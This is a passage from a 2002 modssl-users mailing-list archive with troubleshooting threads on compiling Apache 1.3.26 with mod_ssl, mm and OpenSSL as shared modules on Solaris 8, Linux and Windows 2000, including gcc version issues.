	id 2E1C84CE762; Thu, 18 Jul 2002 10:33:26 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 05CCD28707; Thu, 18 Jul 2002 07:08:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from asgaard.wan.omnes.net id XAA14344; Wed, 17 Jul 2002 23:46:52 +0200 (MET DST)
Received: from SROMERO1-SNS.smc.sns.slb.com (plan9.wan.omnes.net [192.23.85.25])
	by asgaard.wan.omnes.net (8.10.2+Sun/8.10.2) with ESMTP id g6HLkjw08750;
	Wed, 17 Jul 2002 16:46:46 -0500 (CDT)
Message-Id: <5.1.1.1.2.20020717164323.02990e40@asgaard.wan.omnes.net>
X-Sender: sromero@asgaard.wan.omnes.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Wed, 17 Jul 2002 16:44:57 -0500
To: modssl-users@modssl.org,
        "'modssl-users@modssl.org'" 
From: Steve Romero 
Subject: RE: I am having a heck of a time - Please help. -- SOLUTION
  FOUND	!
In-Reply-To: <9C67F3C3FD4F3A43BB64A7C60871DC3F31CD87@sfoexh01.yipes.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Romero 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

David,

yes I've encountered problems with gcc when building apache as well.  I 
don't know what the problem is I always thought it was a version issue.  I 
use a gcc-2.8.1 package from FSF, and that works.  Perhaps I should try 
compiling a newer version of gcc, and not use the Sunfreeware package.

thanks for the research info below.

Regards,
Steve Romero

At 08:45 AM 7/17/2002 -0700, David Loesche wrote:
>Building Apache with EAPI, DSO enabled, mod_ssl and mm is a very simple
>task. I do not know why it took so long to figure out. You simply following
>the instructions in the mod_ssl install documentation (or other helpful
>documents you can find these all over the web), and your up and running with
>Apache - EAPI, DSO, mod_ssl, etc. running.
>
>WRONG!  Not on Solaris 8.  It seems that if you build Apache on Solaris 2.6
>with gcc 2.95 all is well.  Simply following the instructions in the mod_ssl
>documentation and your done.  But it's another story if you are using
>Solaris 8 (I am not sure about 7 or 9 - I do have time to try it on these).
>After many hours of frustration and numerous emails I finally decided to try
>every combination one-by-one to identify which one was the culprit.
>
>Initial environment:
>
>Solaris 8
>Gcc 3.0.3
>Apache 1.3.26
>Mod_ssl-2.8.10-1.3.26
>mm-1.1.3
>openssl-0.9.6d
>
>The only way this combination works is with -enable-rule=SHARED_CORE. This
>option "forces" Apache to export the share symbols so they are available at
>run time.  This takes a 5% performance hit and since the previous build did
>not have it I assumed I was doing something wrong.  So I tried every
>possible build configuration over and over - No change (I had to use the
>SHARE_CORE rule).  I even tried this on Apache 2.0.39 and 1.3.20 (the
>previous build version here of Apache).  No matter what I did I could not
>get it to build the same way as the previous version. More work to do...
>
>2nd shot:
>
>Solaris 8
>Gcc 2.95.3
>Apache 1.3.26
>Mod_ssl-2.8.10-1.3.26
>mm-1.1.3
>openssl-0.9.6d
>
>EVENTS AND SOLUTION:
>
>Same as above.  More work to do...
>
>Last shot:
>
>Solaris 8
>Gcc 3.1
>Apache 1.3.26
>Mod_ssl-2.8.10-1.3.26
>mm-1.1.3
>openssl-0.9.6d
>
>Worked just like all the documentation said it should have and everyone I
>contacted told me to do (which I had spend over a week reading and trying
>all these suggestions).  As it turns out, either the build from
>sunfreeware.com for gcc 2.95 & 3.0.3 have an issue with the loader module,
>the building of shared libraries, or gcc has an issue.  So, if any of you
>have to do this make sure you have gcc 3.1 or SUN's compiler (I believe
>SUN's works but did not try it - I guess I'm just stubborn).
>
>Later,
>
>
>
>-----Original Message-----
>From: David Loesche
>Sent: Monday, July 15, 2002 12:07 PM
>To: 'modssl-users@modssl.org'
>Subject: RE: I am having a heck of a time - Please help.
>
>I did read the referred document concerning the build phase.  I am intrigued
>by the LD_LIBRARY_PATH suggestion.  What would you recommend I set it to?
>
>-----Original Message-----
>From: Boyle Owen [mailto:Owen.Boyle@swx.com]
>Sent: Monday, July 15, 2002 12:51 AM
>To: modssl-users@modssl.org
>Subject: RE: I am having a heck of a time - Please help.
>
>Could be to do with your version of openssl lib (check it is reasonably up
>to date) or with your LD_LIBRARY_PATH environment variable..
>
>Check out http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html
>
>for a good user's summary.
>
>Rgds,
>
>Owen Boyle
>
> >-----Original Message-----
> >From: David Loesche [mailto:DLoesche@yipes.com]
> >Sent: Freitag, 12. Juli 2002 20:12
> >To: 'modssl-users@modssl.org'
> >Subject: I am having a heck of a time - Please help.
> >
> >
> >I have poured through all the documentation I can find on
> >enabling mod_ssl
> >with Apache 1.3.26 but keep coming up short.  If I static link
> >the mod_ssl
> >it works fine but when I try to enable DSO and use it as a
> >shared library I
> >keep getting ap_add_config_define : referenced symbol not
> >found.  I have the
> >following config setup for the apache build:
> >
> >#!/bin/ksh
> >SSL_BASE=/usr/local/ssl \
> >EAPI_MM=../mm-1.1.3 \
> >EAPI_MM_CORE_PATH=logs/httpd.mm \
> >LIBS=/usr/lib/libC.so.5 \
> >CFLAGS=-fPIC \
> >./configure    --prefix=/opt/apache \
> >               --enable-rule=EAPI \
> >               --enable-module=ssl \
> >               --enable-shared=ssl \
> >               --disable-rule=SSL_COMPAT \
> >               --enable-rule=SSL_SDBM \
> >               --enable-suexec \
> >               --suexec-caller=http
> >
> >I have followed the instructions in the modssl install guide to patch
> >Apache.  Please verify the following build for mod_ssl:
> >
> >./configure    --with-apache=../apache_1.3.26 \
> >               --with-ssl=/usr/local/ssl \
> >               --with-mm=../mm-1.1.3
> >
> >If you can help (point me to some documentation) I would be
> >very grateful...
> >
> >
> >David S. Loesche
> >david.loesche@yipes.com                        Yipes
> >Communications, Inc.
> >Main:  (415) 901-2000                  114 Sansome Street, Suite 1045
> >Direct:        (415) 901-2210                  San Francisco, CA 94104
> >Fax:   (415) 901-2201                  http://www.yipes.com
> >
> >Yipes is the defining provider of fully scalable bandwidth for
> >businesses.
> >We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
> >services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
> >increments.
> >
> >Yipes delivers this uniquely flexible service over the first nationwide
> >system of optical IP networks.
> >
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 10:49:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA14023; Thu, 18 Jul 2002 10:47:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mel-rto4.wanadoo.fr id KAA13981; Thu, 18 Jul 2002 10:46:07 +0200 (MET DST)
Received: from mel-rta8.wanadoo.fr (193.252.19.79) by mel-rto4.wanadoo.fr (6.5.007)
        id 3D18589F00C8B861; Thu, 18 Jul 2002 10:45:55 +0200
Received: from fdesar (217.128.211.68) by mel-rta8.wanadoo.fr (6.5.007)
        id 3D2A78F600493EB0; Thu, 18 Jul 2002 10:45:55 +0200
Date: Thu, 18 Jul 2002 10:45:54 +0200
From: François Désarménien 
To: Christopher Welsh 
Cc: modssl-users@modssl.org
Subject: [HS] Re: Mod_Rewrite - errors what am I doing wrong?
Message-Id: <20020718104554.6963da74.francois@fdesar.net>
In-Reply-To: <3D36443B.6010006@barwonwater.vic.gov.au>
References: <3D36443B.6010006@barwonwater.vic.gov.au>
X-Mailer: Sylpheed version 0.6.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: François Désarménien 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thu, 18 Jul 2002 14:29:47 +1000
Christopher Welsh  wrote:

> G'Day,
> 
> Anyone help with this?
> 
> I added rewrite stuff  to the virtual host but am getting an error below

This list is about mod_ssl, so your mod_rewrite problem is completly out
of topic here. And posting tons of lines of configuration is also not a
good idea.

Just to try to help you out : did you load the module with a LoadModule
directive in your httpd.conf ?

F. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 10:52:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA14445; Thu, 18 Jul 2002 10:51:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id KAA14291; Thu, 18 Jul 2002 10:50:07 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.9.3+Sun/8.9.3) with ESMTP id KAA24247
	for ; Thu, 18 Jul 2002 10:50:06 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA24222
	for ; Thu, 18 Jul 2002 10:50:06 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: I am having a heck of a time - Please help. -- SOLUTION FOUND	!
Date: Thu, 18 Jul 2002 10:50:05 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA91F1@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: I am having a heck of a time - Please help. -- SOLUTION FOUND	!
Thread-Index: AcIuNpO9MMkuvbUdTdalTnFueTZ1ywAAWBsw
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA14401
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm running solaris 8 and compiled apache/mod_ssl/mm/DSO with no problems *without* SHARED_CORE... I am using gcc 3.0.3.

Rgds,

Owen Boyle

>-----Original Message-----
>From: Steve Romero [mailto:sromero@smc.sns.slb.com]
>Sent: Mittwoch, 17. Juli 2002 23:45
>To: modssl-users@modssl.org; 'modssl-users@modssl.org'
>Subject: RE: I am having a heck of a time - Please help. -- SOLUTION
>FOUND !
>
>
>David,
>
>yes I've encountered problems with gcc when building apache as 
>well.  I 
>don't know what the problem is I always thought it was a 
>version issue.  I 
>use a gcc-2.8.1 package from FSF, and that works.  Perhaps I 
>should try 
>compiling a newer version of gcc, and not use the Sunfreeware package.
>
>thanks for the research info below.
>
>Regards,
>Steve Romero
>
>At 08:45 AM 7/17/2002 -0700, David Loesche wrote:
>>Building Apache with EAPI, DSO enabled, mod_ssl and mm is a 
>very simple
>>task. I do not know why it took so long to figure out. You 
>simply following
>>the instructions in the mod_ssl install documentation (or 
>other helpful
>>documents you can find these all over the web), and your up 
>and running with
>>Apache - EAPI, DSO, mod_ssl, etc. running.
>>
>>WRONG!  Not on Solaris 8.  It seems that if you build Apache 
>on Solaris 2.6
>>with gcc 2.95 all is well.  Simply following the instructions 
>in the mod_ssl
>>documentation and your done.  But it's another story if you are using
>>Solaris 8 (I am not sure about 7 or 9 - I do have time to try 
>it on these).
>>After many hours of frustration and numerous emails I finally 
>decided to try
>>every combination one-by-one to identify which one was the culprit.
>>
>>Initial environment:
>>
>>Solaris 8
>>Gcc 3.0.3
>>Apache 1.3.26
>>Mod_ssl-2.8.10-1.3.26
>>mm-1.1.3
>>openssl-0.9.6d
>>
>>The only way this combination works is with 
>-enable-rule=SHARED_CORE. This
>>option "forces" Apache to export the share symbols so they 
>are available at
>>run time.  This takes a 5% performance hit and since the 
>previous build did
>>not have it I assumed I was doing something wrong.  So I tried every
>>possible build configuration over and over - No change (I had 
>to use the
>>SHARE_CORE rule).  I even tried this on Apache 2.0.39 and 1.3.20 (the
>>previous build version here of Apache).  No matter what I did 
>I could not
>>get it to build the same way as the previous version. More 
>work to do...
>>
>>2nd shot:
>>
>>Solaris 8
>>Gcc 2.95.3
>>Apache 1.3.26
>>Mod_ssl-2.8.10-1.3.26
>>mm-1.1.3
>>openssl-0.9.6d
>>
>>EVENTS AND SOLUTION:
>>
>>Same as above.  More work to do...
>>
>>Last shot:
>>
>>Solaris 8
>>Gcc 3.1
>>Apache 1.3.26
>>Mod_ssl-2.8.10-1.3.26
>>mm-1.1.3
>>openssl-0.9.6d
>>
>>Worked just like all the documentation said it should have 
>and everyone I
>>contacted told me to do (which I had spend over a week 
>reading and trying
>>all these suggestions).  As it turns out, either the build from
>>sunfreeware.com for gcc 2.95 & 3.0.3 have an issue with the 
>loader module,
>>the building of shared libraries, or gcc has an issue.  So, 
>if any of you
>>have to do this make sure you have gcc 3.1 or SUN's compiler 
>(I believe
>>SUN's works but did not try it - I guess I'm just stubborn).
>>
>>Later,
>>
>>
>>
>>-----Original Message-----
>>From: David Loesche
>>Sent: Monday, July 15, 2002 12:07 PM
>>To: 'modssl-users@modssl.org'
>>Subject: RE: I am having a heck of a time - Please help.
>>
>>I did read the referred document concerning the build phase.  
>I am intrigued
>>by the LD_LIBRARY_PATH suggestion.  What would you recommend 
>I set it to?
>>
>>-----Original Message-----
>>From: Boyle Owen [mailto:Owen.Boyle@swx.com]
>>Sent: Monday, July 15, 2002 12:51 AM
>>To: modssl-users@modssl.org
>>Subject: RE: I am having a heck of a time - Please help.
>>
>>Could be to do with your version of openssl lib (check it is 
>reasonably up
>>to date) or with your LD_LIBRARY_PATH environment variable..
>>
>>Check out 
>http://www.delouw.ch/linux/Apache-Compile-HOWTO/html/apache.html
>>
>>for a good user's summary.
>>
>>Rgds,
>>
>>Owen Boyle
>>
>> >-----Original Message-----
>> >From: David Loesche [mailto:DLoesche@yipes.com]
>> >Sent: Freitag, 12. Juli 2002 20:12
>> >To: 'modssl-users@modssl.org'
>> >Subject: I am having a heck of a time - Please help.
>> >
>> >
>> >I have poured through all the documentation I can find on
>> >enabling mod_ssl
>> >with Apache 1.3.26 but keep coming up short.  If I static link
>> >the mod_ssl
>> >it works fine but when I try to enable DSO and use it as a
>> >shared library I
>> >keep getting ap_add_config_define : referenced symbol not
>> >found.  I have the
>> >following config setup for the apache build:
>> >
>> >#!/bin/ksh
>> >SSL_BASE=/usr/local/ssl \
>> >EAPI_MM=../mm-1.1.3 \
>> >EAPI_MM_CORE_PATH=logs/httpd.mm \
>> >LIBS=/usr/lib/libC.so.5 \
>> >CFLAGS=-fPIC \
>> >./configure    --prefix=/opt/apache \
>> >               --enable-rule=EAPI \
>> >               --enable-module=ssl \
>> >               --enable-shared=ssl \
>> >               --disable-rule=SSL_COMPAT \
>> >               --enable-rule=SSL_SDBM \
>> >               --enable-suexec \
>> >               --suexec-caller=http
>> >
>> >I have followed the instructions in the modssl install 
>guide to patch
>> >Apache.  Please verify the following build for mod_ssl:
>> >
>> >./configure    --with-apache=../apache_1.3.26 \
>> >               --with-ssl=/usr/local/ssl \
>> >               --with-mm=../mm-1.1.3
>> >
>> >If you can help (point me to some documentation) I would be
>> >very grateful...
>> >
>> >
>> >David S. Loesche
>> >david.loesche@yipes.com                        Yipes
>> >Communications, Inc.
>> >Main:  (415) 901-2000                  114 Sansome Street, 
>Suite 1045
>> >Direct:        (415) 901-2210                  San 
>Francisco, CA 94104
>> >Fax:   (415) 901-2201                  http://www.yipes.com
>> >
>> >Yipes is the defining provider of fully scalable bandwidth for
>> >businesses.
>> >We offer fully managed high-speed Internet and Nationwide LAN-to-LAN
>> >services at speeds ranging from 1 Mbps to 1 Gbps, in 1 Mbps
>> >increments.
>> >
>> >Yipes delivers this uniquely flexible service over the 
>first nationwide
>> >system of optical IP networks.
>> >
>> 
>>______________________________________________________________________
>> >Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 14:15:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA28613; Thu, 18 Jul 2002 14:14:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bramg1.net.external.hp.com id OAA28605; Thu, 18 Jul 2002 14:13:57 +0200 (MET DST)
Received: from fowey.BR.ITC.HP.COM (fowey.br.itc.hp.com [15.145.8.186])
	by bramg1.net.external.hp.com (Postfix) with SMTP id A0522235
	for ; Thu, 18 Jul 2002 14:13:55 +0200 (METDST)
Received: from 15.145.8.186 by fowey.BR.ITC.HP.COM (InterScan E-Mail VirusWall NT); Thu, 18 Jul 2002 13:13:55 +0100
Received: by fowey.br.itc.hp.com with Internet Mail Service (5.5.2655.55)
	id <38VCRC6P>; Thu, 18 Jul 2002 13:13:55 +0100
Message-ID: <0B9A57FF1D57D411B47500D0B73E5CC105A92F48@dickens.bri.hp.com>
From: "RUSHTON,NIGEL (HP-UnitedKingdom,ex2)" 
To: "'modssl-users@modssl.org'" 
Subject: LoadModule mod_ssl.so fails with win 2000, apache 1.3.26, mod_ssl
	 2.8.10, openssl 0.9.6d
Date: Thu, 18 Jul 2002 13:13:52 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "RUSHTON,NIGEL (HP-UnitedKingdom,ex2)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Apache fails to start with message:

Syntax error on line 193 of c:/readybuilt_1.3.26_2.8.10/conf/httpd.conf:
Cannot load c:/3party/apache/modules/mod_ssl.so into server: (182)

This fails both with my own build, and also the build at:

http://www.modssl.org/contrib/Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6d-Wi
n32.zip
 
I have checked that the mod_ssl.so file is present, and not read only.

The same symptoms were reported by Danalien
[mailto:danalien@datormaffian.com]
on apache 1.3.24 + mod_ssl 2.8.8, also with Windows 2000.

Any suggestions?

Nigel Rushton
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 14:26:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29362; Thu, 18 Jul 2002 14:25:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id OAA29330; Thu, 18 Jul 2002 14:24:34 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id IAA21107
	for ; Thu, 18 Jul 2002 08:26:33 -0400
Date: Thu, 18 Jul 2002 08:26:33 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: RE: modssl with a shared ssl lib base 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Howdy David,

This is an oler linux system.  I've been reading along with yer trials and
tribulations, I'm not having to do this on a sun system though, my sparc10
here runs openbsd, but the web server is an older slackware 2.0.35/36
system.  Everything built fine upto appache 1.3.30 with
openssl-engine-0.9.6b .  Thus, my
question about current attepmts, which fail with apache 1.3.26 and
openssl-engine-0.9.6d .  What I end up
with is a decent httpd with a truncated libssl.so, like 5 times smaller
then previously, thus, my suspicion that the older apache's <1.3.x> fail
if openssl is compiled shared <.so> rather then non-shared libraries.

I've toyed about with this configureation script:

#!/bin/bash

#configure ssl

cd mod_ssl-2.8.10-1.3.26/
./configure  --with-apache=../apache_1.3.26
--with-crt=/usr/local/apache/conf/ssl.crt/server.crt
--with-key=/usr/local/apache/conf/ssl.key/server.key
#./configure  --with-apache=../apache_1.3.26
#--with-ssl=../openssl-engine-0.9.6d --with-mm=../mm-1.1.3
#--with-crt=/usr/local/apache/conf/ssl.crt/server.crt
#--with-key=/usr/local/apache/conf/ssl.key/server.key
#--disable-rule=SSL_COMPAT --enable-module=most

# configure apache

cd ../apache_1.3.26/
 export SSL_BASE=../openssl-engine-0.9.6d
 export EAPI_MM=../mm-1.1.3
# export $SSL_BASE $EAPI_MM
# ./configure  --enable-module=ssl --enable-shared=ssl
#--enable-rule=SSL_SDBM --disable-rule=SSL_COMPAT --enable-module=most
# ./configure  --enable-module=ssl --enable-shared=ssl
#--disable-rule=SSL_COMPAT --enable-module=most
 ./configure  --enable-module=ssl --enable-shared=ssl
--enable-module=most
# --enable-shared=max
make


# if all goes well, we need to do a make install

echo "          "
echo "          ...if all goes well, we need to do a make install..."
echo "          "


exit 0

Now, I certainly would have loved to move to apache 2.0.current, but, it's
not liking the older linux kernels at all.  I messed with the apache
source some, after I think Owen gave me some direction, but, alas, it
does not run a decent full compile and the apache team won't go grab old
kernels and test to try and deal with the issues.

# gcc --version
2.7.2.3

So, I hate having to backup and then restore all the time testing this,
but am about ready to just recompile openssl unshared and redo, I'm
certainly betting it will fix the issues of a truncated libssl.so...

my older working libssl.so look like this:

-rwx------   1 root     root      1080038 Jul 15 13:45
/usr/local/apache/libexec/libssl.so*

New attempts to build with the above script come up with a module like
this that will not load:

# ls -l src/modules/ssl//libssl.so
-rwx------   1 root     root       224759 Jul 17 13:12
src/modules/ssl//libssl.so*


Thanks,

Ron DuFresne

On Wed, 17 Jul 2002, David Loesche wrote:

> What is the environment you are working on (OS, Compiler, etc)?  Also, check
> out the documentation located at www.modssl.org (install document).  If you
> are building on Solaris drop another line and I will forward you some
> information (I just spent some time debugging an issue with gcc and Solaris
> 8).
> 
> -----Original Message-----
> From: R. DuFresne [mailto:dufresne@sysinfo.com]
> Sent: Wednesday, July 17, 2002 9:53 AM
> To: modssl-users@modssl.org
> Subject: modssl with a shared ssl lib base
> 
> 
> Since apache 2.0.X will not function with older kernels, we have been
> trying to upgrade to apache_1.3.26 and wheen out of reliance for present
> upon the mod_blowchunks.so thing we have implimented till time permitted.
> But, we had decided to build ssl-engine with shared capability, so as to
> not have to jump through hoops if matters with apache 2.0.X changed and
> such.  But, we are failing to get a working httpd when going this route.
> I'm wondering if the older apache fails, at least on older kernels, when
> ssl has been compiled as an so?
> 
> Thanks,
> 
> 
> Ron DuFresne
> --
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>         admin & senior security consultant:  sysinfo.com
>                         http://sysinfo.com
> 
> "Cutting the space budget really restores my faith in humanity.  It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation."
>                 -- Johnny Hart
> 
> testing, only testing, and damn good at it too!
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 15:09:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02251; Thu, 18 Jul 2002 15:08:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA02182; Thu, 18 Jul 2002 15:07:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A09B14CE581; Thu, 18 Jul 2002 15:07:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 14A7328672; Thu, 18 Jul 2002 15:05:29 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from net.atrid.fr id KAA13970; Thu, 18 Jul 2002 10:45:47 +0200 (MET DST)
Received: (qmail 15981 invoked from network); 18 Jul 2002 08:45:39 -0000
Received: from unknown (HELO serveur.orsay.atrid.fr) (194.250.0.213)
  by net.atrid.fr with SMTP; 18 Jul 2002 08:45:39 -0000
Received: from fdesar (fdesar.paris.atrid.fr [192.168.20.48])
	by serveur.orsay.atrid.fr (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id KAA13751;
	Thu, 18 Jul 2002 10:45:38 +0200
Date: Thu, 18 Jul 2002 10:45:37 +0200
From: François Désarménien 
To: Christopher Welsh 
Cc: modssl-users@modssl.org
Subject: [HS] Re: Mod_Rewrite - errors what am I doing wrong?
Message-Id: <20020718104537.4e035e5c.f.desarmenien@atrid.fr>
In-Reply-To: <3D36443B.6010006@barwonwater.vic.gov.au>
References: <3D36443B.6010006@barwonwater.vic.gov.au>
Organization: Atrid Systèmes
X-Mailer: Sylpheed version 0.6.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: François Désarménien 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thu, 18 Jul 2002 14:29:47 +1000
Christopher Welsh  wrote:

> G'Day,
> 
> Anyone help with this?
> 
> I added rewrite stuff  to the virtual host but am getting an error below

This list is about mod_ssl, so your mod_rewrite problem is completly out
of topic here. And posting tons of lines of configuration is also not a
good idea.

Just to try to help you out : did you load the module with a LoadModule
directive in your httpd.conf ?

F. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 18 15:09:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA02262; Thu, 18 Jul 2002 15:08:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA02183; Thu, 18 Jul 2002 15:07:08 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B5F164CE729; Thu, 18 Jul 2002 15:07:07 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 1FC4428706; Thu, 18 Jul 2002 15:05:44 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp01ffm.de.uu.net id LAA16399; Thu, 18 Jul 2002 11:17:18 +0200 (MET DST)
Received: from worf.de.uu.net (worf.de.uu.net [195.126.111.146])
	by smtp01ffm.de.uu.net (5.5.5/5.5.5) with ESMTP id LAA12984
	for ; Thu, 18 Jul 2002 11:17:18 +0200 (MET DST)
Message-Id: <200207180917.LAA12984@smtp01ffm.de.uu.net>
X-Mailer: exmh version 2.5 10/19/2001 with nmh-1.0.4
From: Georg Oppenberg 
To: modssl-users@modssl.org
Subject: Re: I am having a heck of a time - Please help. -- SOLUTION 
 FOUND !
